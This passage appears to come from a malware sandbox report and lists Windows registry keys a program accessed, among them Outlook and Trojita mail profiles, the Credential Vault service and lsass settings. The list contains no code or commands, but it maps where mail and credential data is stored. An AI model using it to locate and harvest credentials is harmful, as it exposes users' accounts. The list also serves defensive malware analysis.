Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E} HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\Email HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook HKEY_CURRENT_USER\SOFTWARE\flaska.net\trojita HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanmanWorkstation\Parameters HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LanmanWorkstation\Parameters\RpcCacheTimeout HKEY_LOCAL_MACHINE\\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xd0\x8c\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xd1\x9c\xef\xbf\xbd\xef\xbf\xbd\xd0\x8c\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xd0\x99\xef\xbf\xbd\xef\xbf\xbd\xd1\x8f\xef\xbf\xbd\xef\xbf\xbd HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcSs HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcSs\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\WOW64 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Public HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Default HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir (x86) HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir (x86) HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramW6432Dir HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonW6432Dir HKEY_USERS\S-1-5-18 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-18 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-18\ProfileImagePath HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData HKEY_USERS\.DEFAULT\Environment HKEY_USERS\.DEFAULT\Volatile Environment HKEY_USERS\.DEFAULT\Volatile Environment\0 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\Environment HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\RequiredPrivileges HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\lsass.exe HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EventSystem HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EventSystem\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\RequiredPrivileges HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppIDSvc HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppIDSvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppIDSvc\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Appinfo HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Appinfo\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Appinfo\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppMgmt HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppMgmt\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppMgmt\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AxInstSV HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AxInstSV\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AxInstSV\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BDESVC HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BDESVC\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BDESVC\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\bthserv HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\bthserv\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\bthserv\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CertPropSvc HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CertPropSvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CertPropSvc\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\dot3svc HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\dot3svc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\dot3svc\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EapHost HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EapHost\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EapHost\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EFS HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EFS\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EFS\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\fdPHost HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\fdPHost\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\fdPHost\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hidserv HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hidserv\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hidserv\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hkmsvc HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hkmsvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hkmsvc\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupListener HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupListener\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupListener\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupProvider HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupProvider\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupProvider\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\idsvc HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\idsvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\idsvc\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\IPBusEnum HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\IPBusEnum\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\IPBusEnum\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KeyIso HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KeyIso\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KeyIso\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KtmRm HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KtmRm\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KtmRm\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lltdsvc HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lltdsvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lltdsvc\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lmhosts HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lmhosts\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lmhosts\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Mcx2Svc HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Mcx2Svc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Mcx2Svc\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MpsSvc HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MpsSvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MpsSvc\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MSiSCSI HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MSiSCSI\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MSiSCSI\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Netlogon HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Netlogon\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Netlogon\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetMsmqActivator HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetMsmqActivator\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetMsmqActivator\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetPipeActivator HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetPipeActivator\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetPipeActivator\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpActivator HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpActivator\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpActivator\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpPortSharing HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpPortSharing\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpPortSharing\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2pimsvc HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2pimsvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2pimsvc\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2psvc HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2psvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2psvc\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PeerDistSvc HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PeerDistSvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PeerDistSvc\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\pla HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\pla\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\pla\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PNRPAutoReg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PNRPAutoReg\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PNRPAutoReg\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PNRPsvc HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PNRPsvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PNRPsvc\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ProtectedStorage HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ProtectedStorage\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ProtectedStorage\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\QWAVE HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\QWAVE\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\QWAVE\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasAuto HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasAuto\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasAuto\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasMan HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasMan\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasMan\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteAccess HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteAccess\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteAccess\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteRegistry HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteRegistry\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteRegistry\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCardSvr HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCardSvr\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCardSvr\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCPolicySvc HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCPolicySvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCPolicySvc\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\seclogon HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\seclogon\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\seclogon\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SensrSvc HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SensrSvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SensrSvc\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SessionEnv HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SessionEnv\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SessionEnv\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SharedAccess HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SharedAccess\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SharedAccess\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppuinotify HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppuinotify\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppuinotify\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SSDPSRV HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SSDPSRV\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SSDPSRV\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SstpSvc HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SstpSvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SstpSvc\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\StorSvc HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\StorSvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\StorSvc\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TabletInputService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TabletInputService\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TabletInputService\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TapiSrv HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TapiSrv\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TapiSrv\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TBS HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TBS\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TBS\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TermService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TermService\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TermService\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\THREADORDER HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\THREADORDER\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\THREADORDER\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\UmRdpService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\UmRdpService\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\UmRdpService\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\upnphost HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\upnphost\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\upnphost\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\W32Time HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\W32Time\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\W32Time\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WbioSrvc HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WbioSrvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WbioSrvc\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wcncsvc HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wcncsvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wcncsvc\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WcsPlugInService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WcsPlugInService\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WcsPlugInService\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WebClient HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WebClient\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WebClient\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wecsvc HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wecsvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wecsvc\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wercplsupport HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wercplsupport\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wercplsupport\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinDefend HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinDefend\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinDefend\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinRM HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinRM\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinRM\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wlansvc HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wlansvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wlansvc\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WPCSvc HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WPCSvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WPCSvc\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wudfsvc HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wudfsvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wudfsvc\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WwanSvc HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WwanSvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WwanSvc\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\Group HKEY_USERS\S-1-5-19 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppIDSvc\RequiredPrivileges HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub\RequiredPrivileges HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\RequiredPrivileges HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Mcx2Svc\RequiredPrivileges HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\QWAVE\RequiredPrivileges HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCardSvr\RequiredPrivileges HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SensrSvc\RequiredPrivileges HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SSDPSRV\RequiredPrivileges HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TBS\RequiredPrivileges HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\upnphost\RequiredPrivileges HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wcncsvc\RequiredPrivileges HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-19 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-19\ProfileImagePath HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData HKEY_USERS\S-1-5-19\Environment HKEY_USERS\S-1-5-19\Volatile Environment HKEY_USERS\S-1-5-19\Volatile Environment\0 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Environment HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\ObjectName HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-1822907384-1282624486-319450072-1000\ProfileImagePath HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Environment HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Volatile Environment HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Volatile Environment\0 